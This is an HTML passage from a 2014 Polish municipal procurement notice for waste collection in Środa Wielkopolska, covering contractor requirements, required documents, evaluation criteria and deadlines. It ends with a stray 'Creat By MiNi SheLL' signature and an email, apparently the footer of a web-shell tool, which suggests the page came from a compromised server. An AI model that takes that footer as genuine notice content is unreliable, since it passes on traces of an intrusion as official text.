Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże , że dysponuje wyposażeniem umożliwiającym odbieranie odpadów komunalnych od właścicieli nieruchomości w ilości co najmniej; dwóch pojazdów specjalistycznych przystosowanych do odbierania zmieszanych odpadów komunalnych oraz dwóch pojazdów przystosowanych do odbierania selektywnie zebranych odpadów komunalnych oraz jednego pojazdu przystosowanego do odbioru odpadów bez funkcji kompaktującej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy stanowiący załącznik nr 1 do SIWZ.  Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy,
Pełnomocnictwo w oryginale do podpisywania oferty lub kserokopia pełnomocnictwa poświadczona przez notariusza, z którego wynika prawo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów (pełnomocnictwo nie jest wymagane, jeżeli podpisujący jest lub są właścicielami firmy lub jeżeli są oni wymienieni z imienia i nazwiska w  dokumencie  rejestrowym). W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu potencjale technicznym osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych art. 26 ust. 2b ustawy pzp zobowiązany jest udowodnić, iż będzie dysponował  tymi zasobami  w trakcie  realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia.W przypadku złożenia przez Wykonawców dokumentów zawierających dane przedstawione w walutach obcych, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 
Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest wstanie wykazać za pomocą dowolnych środków dowodowych zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do składania negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia  wykonawcy który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do  ich naprawienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Czas reakcji Wykonawcy na dodatkowe zlecenie zamawiającego - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jednakże Zamawiający przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty oraz określa warunki takiej zmiany. Warunki takich zmian określono następująco
1.1.Zmiana terminu realizacji umowy.
a) z powodu zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego ,
b) z powodu okoliczności siły wyższej np. wystąpienie zdarzenia losowego wywołanego przez czynniki zewnętrzne, 
c)  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, 
1.2. Pozostałe zmiany:
a)z powodu zmiany urzędowej stawki należnych podatków i opłat w szczególności zmiany podatku VAT. W przypadku zmiany stawki podatków i opłat przez władzę ustawodawczą kwota brutto wynagrodzenia zostanie zmieniona poprzez wprowadzenie odpowiedniej zmieniony  do umowy. Powyższe dotyczyć będzie wartości przedmiotu umowy, w części, jakiej dotyczą te zmiany przepisów;
b)Zmiana osób, podwykonawców przy pomocy których Wykonawca realizuje przedmiot umowy,  na inne legitymujące się co najmniej równoważnym doświadczeniem i uprawnieniami, o których mowa w ustawie Prawo budowlane oraz, które wymagane były przez Zamawiającego. Zmiany te będą dokonywane na podstawie zatwierdzonych wniosków przez strony;

Zmiany określone w punkcie 1.2 nie powodują zmiany wynagrodzenia Wykonawcy z wyłączeniem punktu 1.2. lit. a). 
Okoliczności wymienione w punkcie 1.1 i 1.2 z wyłączeniem punktu 1.2 lit a) stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Zmiany do umowy może zainicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmiany i jej uzasadnienie. 
Powyższe zmiany zostaną dokonane w taki sposób, aby dodatkowy czas był uzasadniony okresem trwania przeszkody. W przypadku gdy strony w drodze negocjacji dojdą do porozumienia odnośnie zakresu i treści wprowadzonych zmian, podpisana zostanie  zmiana do umowy.  
2. Zmiana uchwały Sejmiku Województwa Wielkopolskiego z dnia 27 sierpnia 2012 w sprawie wykonania  Planu Gospodarki Odpadami dla województwa wielkopolskiego na lata 2012-2027.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.srodawlkp.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędu Miejskiego w Środzie Wielkopolskiej  ul. Daszyńskiego 5 pokój nr 220.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2014 godzina 10:00, miejsce: Urzędu Miejskiego w Środzie Wielkopolskiej ul. Daszyńskiego 5 pokój nr 214 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com